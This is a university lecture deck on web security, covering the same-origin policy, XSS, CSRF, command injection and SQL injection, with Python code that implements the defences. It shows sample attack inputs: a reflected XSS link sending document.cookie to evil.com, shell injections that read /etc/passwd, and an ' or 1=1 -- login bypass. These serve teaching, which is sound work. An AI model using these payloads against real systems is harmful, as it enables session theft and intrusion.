CS 181S Spring 2024
Lecture 25: Web Security
Networking Stack
Layer              Protocol    Function
7 - Application    HTTP        Deliver content
6 - Presentation   TLS/SSL     Manage encoding
5 - Session                    Manage sessions
4 - Transport      TCP/UDP     Deliver (un)reliably
3 - Network        IP          Deliver globally
2 - Data Link      Ethernet    Deliver locally
1 - Physical       0s and 1s   Deliver signals
Application Layer: HTTP
• Hypertext Transfer Protocol (HTTP) is an application protocol for distributed information systems
• Stateless request-response protocol
• Requests resources identified by Uniform Resource Locators (URLs)
Request   Response
GET       Retrieve resource (no side effects)
HEAD      Retrieve header for GET request (no body)
POST      Requests that server accept new object (e.g., results of form or new database item) and store it as subordinate of resource identified by URI
PUT       Requests that server store new object under supplied URI
DELETE    Delete specified resource
Example Request
• HTTP Request: [figure: request line (Request Method, Path, Protocol Version) followed by Headers]
• HTTP Response: [figure: Header followed by Body]
HTTP Response Codes
Code Message
200 OK
201 Created
302 Found
401 Unauthorized
403 Forbidden
404 Not Found
409 Conflict
500 Internal Server Error
502 Bad Gateway
Vulnerabilities by Year
[Chart: number of reported vulnerabilities per year, 2000 to 2023 (y-axis 0 to 3500), for the categories DDOS, Overflow, XSS, CSRF, SQL]
Vulnerability Occurrence in Applications
[Chart: percentage of applications (0% to 90%) affected by Injection (O1), CSRF, Broken Access Control (O5), Broken Authentication (O2), XSS (O7), Misconfigurations (O6)]
HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>CS 181S - Fall 2018</title>
<link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,300i,600,700,700i' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Inconsolata:400,700,700i' rel='stylesheet' type='text/css'>
<link href="resources/css/bootstrap.min.css" rel="stylesheet">
<link rel="stylesheet" href="resources/css/main.css">
</head>
<body>
<header class="site-header">
<div class="navbar navbar-inverse navbar-fixed-top">
<div class="container-fluid">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="/courses/cs5430/2018sp/">CS 181S
<span class="hidden-xs hidden-sm">: System Security</span>
<span class="hidden-md hidden-lg"> - Fall 2018</span>
</a>
</div>
Dynamic Web Pages
Server-Side
• PHP
• Ruby
• Python
• Java
• Go
Client-Side
• Javascript
Same Origin Policy (SOP)
Data for http://www.example.com/dir/page.html accessed by:
• http://www.example.com/dir/page2.html
• http://www.example.com/dir2/page3.html
• https://www.example.com/dir/page.html
• http://www.example.com:81/dir/page.html
• http://www.example.com:80/dir/page.html
• http://evil.com/dir/page.html
• http://example.com/dir/page.html
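The origin comparison the slide asks about, worked as an added Python example (not code from the lecture): an origin is the (scheme, host, effective port) triple, so the default port for the scheme has to be filled in before comparing. The reference URL and candidates are the slide's example.com URLs.

```python
from urllib.parse import urlsplit

# Effective ports: "http://host:80/..." and "http://host/..." are the same origin.
DEFAULT_PORTS = {"http": 80, "https": 443}

# The slide's reference document and its seven candidate URLs.
REFERENCE = "http://www.example.com/dir/page.html"
CANDIDATES = [
    "http://www.example.com/dir/page2.html",
    "http://www.example.com/dir2/page3.html",
    "https://www.example.com/dir/page.html",
    "http://www.example.com:81/dir/page.html",
    "http://www.example.com:80/dir/page.html",
    "http://evil.com/dir/page.html",
    "http://example.com/dir/page.html",
]


def origin(url: str) -> tuple:
    """The (scheme, host, effective port) triple that the SOP compares.

    Path, query and fragment are ignored on purpose: they never affect origin.
    Note that example.com and www.example.com are different hosts; only the
    document.domain relaxation on the next slide can bridge them.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)


def same_origin(url_a: str, url_b: str) -> bool:
    """True iff a document at url_a may read data belonging to url_b."""
    return origin(url_a) == origin(url_b)


def classify(reference: str = REFERENCE, candidates=CANDIDATES) -> dict:
    """Map each candidate URL to whether it shares the reference's origin."""
    return {url: same_origin(reference, url) for url in candidates}


if __name__ == "__main__":
    for url, allowed in classify().items():
        print("same origin" if allowed else "blocked    ", url)
```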
SOP Exceptions
• Domain relaxation: document.domain
• Cross-origin network requests: Access-Control-Allow-Origin
• Cross-origin client-side communication: postMessage
• Importing scripts
Cross-Site Scripting (XSS)
• Form of code injection
• evil.com sends victim a script that runs on example.com
Reflected XSS
[Diagram: Attack Server and Victim Server, five numbered steps: receive malicious link, click on link, echo user input, send valuable data, visit web site]
Reflected XSS
• Search field on victim.com:
• http://victim.com/search.php?term=apple
• Server-side implementation of search.php:
<html>
<title> Search Results </title>
<body> Results for <?php echo $_GET['term']; ?>: ...</body>
</html>
• What if victim instead clicks on:
http://victim.com/search.php?term=<script> window.open("http://evil.com?cookie=" + document.cookie) </script>
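The search.php behaviour above beside its hardened form, as an added Python example (not the lecture's code): the unsafe renderer echoes the term verbatim as the PHP does, the safe one HTML-encodes it, which is the "parameter validation" defence on the XSS Defenses slide. The payload and URL are constructed to mirror the slide's link.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payload modelled on the slide's link (the exact JavaScript is immaterial).
PAYLOAD = "<script>window.open('http://evil.com?cookie=' + document.cookie)</script>"
ATTACK_URL = "http://victim.com/search.php?term=" + quote(PAYLOAD)


def term_from_url(url: str) -> str:
    """What search.php sees in $_GET['term']: the URL-decoded query parameter."""
    return parse_qs(urlsplit(url).query).get("term", [""])[0]


def render_unsafe(term: str) -> str:
    """Faithful to the slide's search.php: the term is echoed verbatim into HTML."""
    return f"<html><title>Search Results</title><body>Results for {term}: ...</body></html>"


def render_safe(term: str) -> str:
    """Hardened: HTML-encode the term so the browser renders it as text, not markup.

    quote=True also encodes ' and ", which matters when data lands inside an attribute.
    """
    safe_term = html.escape(term, quote=True)
    return f"<html><title>Search Results</title><body>Results for {safe_term}: ...</body></html>"


def contains_script_tag(page: str) -> bool:
    """Crude check used only to compare the two renderings."""
    return "<script" in page.lower()


if __name__ == "__main__":
    term = term_from_url(ATTACK_URL)
    print("unsafe:", render_unsafe(term))
    print("safe:  ", render_safe(term))
```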
Reflected XSS
[Diagram: www.evil.com (Attack Server) and www.victim.com (Victim Server): user gets bad link, user clicks on link, victim echoes user input]
Link: http://victim.com/search.php?term=<script> ... </script>
Page echoed by the victim server:
<html>
Results for
<script>
window.open(http://attacker.com? ... document.cookie ...)
</script>
</html>
Stored XSS
[Diagram: Attack Server, Server Victim, User Victim; steps 1 to 4: inject malicious script, request content, receive malicious script, steal valuable data]
Stored XSS attack vectors
• loaded images
• HTML attributes
• user content (comments, blog posts)
Example XSS attacks
XSS Defenses
• Parameter Validation
• HTTP-Only Cookies
• Dynamic Data Tainting
• Static Analysis
• Script Sandboxing
Cookies
• Cookies are small blocks of data stored locally by the web browser
• Cookie is sent with every request to that domain
• Can be used to keep track of whether a user has authenticated (as which user)
• And also other things…
• Can be set by third parties
Cross-Site Request Forgery (CSRF)
[Diagram: Attack Server, Server Victim, User Victim; steps 1 to 4: establish session, visit server (or iframe), receive malicious page, send forged request (w/ cookie)]
CSRF Defenses
• Secret Validation Token: <input type=hidden value=23a3af01b>
• Referrer Validation (Referer header): http://www.facebook.com/home.php
• Custom HTTP Header: X-Requested-By: XMLHttpRequest
• User Interaction (e.g., CAPTCHA)
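The first three defences on the slide, implemented server-side as an added Python example (not the lecture's code): a per-session secret validation token derived by HMAC, a Referer check against the site's own host, and the custom header check. The site host, session id and server key are constructed; a real server would keep the key secret and stable across restarts.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed values: the host is the one in the slide's Referer example; the key
# would be a long-lived server secret in practice, here generated at import time.
SITE_HOST = "www.facebook.com"
SERVER_KEY = secrets.token_bytes(32)


def csrf_token(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Secret validation token bound to the session: HMAC(key, session id).

    Deriving it from the session means no token store is needed, and a token
    captured from one session is useless in another.
    """
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()


def hidden_input(session_id: str) -> str:
    """The form field the slide shows: <input type=hidden value=...>."""
    return f'<input type="hidden" name="csrf_token" value="{csrf_token(session_id)}">'


def token_is_valid(session_id: str, submitted, key: bytes = SERVER_KEY) -> bool:
    # compare_digest avoids leaking the token byte by byte through timing.
    return hmac.compare_digest(csrf_token(session_id, key), submitted or "")


def referer_is_valid(headers: dict) -> bool:
    """Referrer validation: the request must come from a page on SITE_HOST.

    Assumption: a missing Referer is rejected (strict mode); lenient deployments
    accept it because some browsers and proxies strip the header.
    """
    ref = headers.get("Referer")
    return bool(ref) and urlsplit(ref).hostname == SITE_HOST


def custom_header_present(headers: dict) -> bool:
    """Custom HTTP header: a cross-site form post cannot add X-Requested-By."""
    return headers.get("X-Requested-By") == "XMLHttpRequest"


def accept_state_change(session_id: str, form: dict, headers: dict) -> bool:
    """Defence in depth: require all three checks before acting on the request."""
    return (token_is_valid(session_id, form.get("csrf_token"))
            and referer_is_valid(headers)
            and custom_header_present(headers))


# Constructed requests: one legitimate, one forged from evil.com (only the cookie rides along).
SESSION = "sess-0123"
LEGIT = ({"csrf_token": csrf_token(SESSION)},
         {"Referer": "http://www.facebook.com/home.php", "X-Requested-By": "XMLHttpRequest"})
FORGED = ({}, {"Referer": "http://evil.com/attack.html"})

if __name__ == "__main__":
    print(hidden_input(SESSION))
    print("legit accepted:", accept_state_change(SESSION, *LEGIT))
    print("forged accepted:", accept_state_change(SESSION, *FORGED))
```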
Command Injection
• Key issue: exporting local execution capability via Web interface
• Request: http://vulnsite/ping?host=8.8.8.8
• Executes: ping -c 2 8.8.8.8
• Simple command injection
• Request: http://vulnsite/ping?host=8.8.8.8;cat /etc/passwd
• Executes: ping -c 2 8.8.8.8;cat /etc/passwd
• Outputs ping output and the contents of "/etc/passwd"
• Getting sneakier…
• ping -c 2 8.8.8.8|cat /etc/passwd
• ping -c 2 8.8.8.8&cat$IFS$9/etc/passwd
• ping -c 2 $(cat /etc/passwd)
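A hardened version of the ping endpoint, as an added Python example (not the lecture's code): the host is allow-list validated as an IP literal or hostname, and the command runs as an argv list without a shell, so none of the slide's separators or substitutions is interpreted. The endpoint handler `ping()` is hypothetical; the test inputs are the slide's four injection strings plus a flag-injection attempt.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
# Anything containing ; | & $ ( ) / or whitespace cannot match.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$)(?:{_LABEL}\.)*{_LABEL}$")

# The slide's injection attempts, plus "-f", as constructed test inputs.
INJECTION_ATTEMPTS = [
    "8.8.8.8;cat /etc/passwd",
    "8.8.8.8|cat /etc/passwd",
    "8.8.8.8&cat$IFS$9/etc/passwd",
    "$(cat /etc/passwd)",
    "-f",
]


def validate_host(host: str) -> str:
    """Allow-list check: accept only an IP literal or a hostname, else ValueError.

    Labels cannot start with '-', so the value can never be parsed by ping as an option.
    """
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"invalid host: {host!r}")


def build_ping_argv(host: str) -> list:
    """argv for 'ping -c 2 <host>'. Passed to the OS as a list (shell=False), so
    ; | & $IFS and $() would be ordinary characters even if validation let them through."""
    return ["ping", "-c", "2", validate_host(host)]


def ping(host: str, timeout: float = 10.0) -> str:
    """Hypothetical endpoint handler: run the validated command without a shell."""
    proc = subprocess.run(build_ping_argv(host), capture_output=True, text=True,
                          timeout=timeout, check=False)
    return proc.stdout


def is_rejected(host: str) -> bool:
    """True if validation refuses the host (used to check the injection attempts)."""
    try:
        build_ping_argv(host)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for attempt in INJECTION_ATTEMPTS:
        print("rejected" if is_rejected(attempt) else "ACCEPTED", repr(attempt))
```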
SQL Injection
• SQL Injection is another example of code injection
• Adversary exploits user-controlled input to change meaning of database command
SQL Injection
[Diagram: Web Browser (Client) → Web Server → DB. The user enters Username & Password; the web server sends the DB:]
SELECT *
FROM Users
WHERE user='me'
AND pwd='1234'
What if user = " ' or 1=1 -- "
SQLi in the Wild
Defenses Against SQL Injection
• Prepared Statements:
String custname = request.getParameter("customerName");
// perform input validation to detect attacks
String query = "SELECT account_balance FROM user_data WHERE user_name = ?";
PreparedStatement pstmt = connection.prepareStatement(query);
pstmt.setString(1, custname);
ResultSet results = pstmt.executeQuery();
• Input Validation:
• Case statements, cast to non-string type
• Escape user-supplied inputs:
• Not recommended
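The login query from the SQL Injection slides run both ways, as an added Python example (not the lecture's Java): the concatenated query is subverted by the slide's username, the parameterised query (Python's form of PreparedStatement) is not, and casting an id to int shows the "cast to non-string type" defence. The in-memory SQLite table and rows are constructed sample data.

```python
import sqlite3

# Constructed sample data; the table mirrors the slide's Users(user, pwd) with an id added.
SAMPLE_ROWS = [(1, "me", "1234"), (2, "alice", "hunter2")]
INJECTION = "' or 1=1 --"   # the slide's username


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def login_vulnerable(conn, user: str, pwd: str) -> list:
    """Builds the slide's query by string concatenation, so input is parsed as SQL.

    With user = "' or 1=1 --" the WHERE clause becomes
        user='' or 1=1 --' AND pwd='...'
    and the comment swallows the password check: every row comes back.
    """
    sql = f"SELECT * FROM Users WHERE user='{user}' AND pwd='{pwd}'"
    return conn.execute(sql).fetchall()


def login_prepared(conn, user: str, pwd: str) -> list:
    """Prepared statement: the query text is fixed and the values travel separately,
    so quotes and -- inside them are plain data, never SQL."""
    return conn.execute("SELECT * FROM Users WHERE user=? AND pwd=?", (user, pwd)).fetchall()


def account_by_id(conn, raw_id: str) -> list:
    """Input validation by casting to a non-string type: int() rejects '1 or 1=1'."""
    uid = int(raw_id)
    return conn.execute("SELECT * FROM Users WHERE id=?", (uid,)).fetchall()


def id_lookup_rejected(conn, raw_id: str) -> bool:
    try:
        account_by_id(conn, raw_id)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, INJECTION, "wrong"))
    print("prepared:  ", login_prepared(db, INJECTION, "wrong"))
```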
SQL Injection

Web Security and its Importance in the Present era


Editor's Notes

  • #4: Demo: course website w/ web inspector + wireshark
  • #6: https://nvd.nist.gov/vuln/search Basic Statistics keywords: "denial", "overflow", "xss", "csrf", "SQL"
  • #7: https://owasp.org/www-project-top-ten/
  • #9: https://www.ptsecurity.com/ww-en/analytics/web-vulnerabilities-2020/ Hackers can attack users in 9 out of 10 web applications. Attacks include redirecting users to a hacker-controlled resource, stealing credentials in phishing attacks, and infecting computers with malware. Unauthorized access to applications is possible on 39 percent of sites. In 2019, full control of the system could be obtained on 16 percent of web applications. On 8 percent of systems, full control of the web application server allowed attacking the local network.
  • #10: https://www.ptsecurity.com/ww-en/analytics/web-vulnerabilities-2020/
  • #12: Demo: minesweeper in javascript
  • #15: scripts can be imported from remote origins; they have the privileges of the importing page (not the source)
  • #21: Wordpress (2024): https://www.searchenginejournal.com/wordpress-discovers-xss-vulnerability-recommends-updating-to-6-5-2/513501/ https://cybersecuritynews.com/xss-remains-as-the-most-vulnerability/ Joomla (2024): https://www.darkreading.com/application-security/joomla-xss-bugs-open-millions-websites-rce Azure (2023): https://www.darkreading.com/application-security/microsoft-azure-hdinsight-xss-vulnerabilities Zimbra (2023): https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/ Yahoo mail (2016): https://nakedsecurity.sophos.com/2016/01/21/xss-bug-in-yahoo-mail-could-have-let-attackers-take-over-email-accounts/ Stored XSS on ebay (2017): malicious sellers added scripts to legitimate product listings to redirect users to a spoofed login page that harvested credentials before redirecting users back to a legitimate eBay page. https://news.netcraft.com/archives/2017/02/17/hackers-still-exploiting-ebays-stored-xss-vulnerabilities-in-2017.html Expandable ads (2018): https://threatpost.com/once-popular-online-ad-format-opens-top-tier-sites-to-xss-attacks/137681/
  • #23: -standard cookies, third party cookies
  • #26: | is pipe; $IFS is the environment variable for the inter-command separator (by default, space); $9 is the ninth arg (always empty string)
  • #30: Wordpress (2024): https://www.darkreading.com/remote-workforce/critical-security-flaw-wordpress-sql-injection Fortinet (2024): https://www.scmagazine.com/news/fortinet-forticlient-ems-sql-injection-flaw-exploited-in-the-wild MoveIt (2023): https://www.theregister.com/2023/06/01/moveit_transfer_zero_day/ https://www.theregister.com/2024/03/26/fbi_cisa_sql_injection/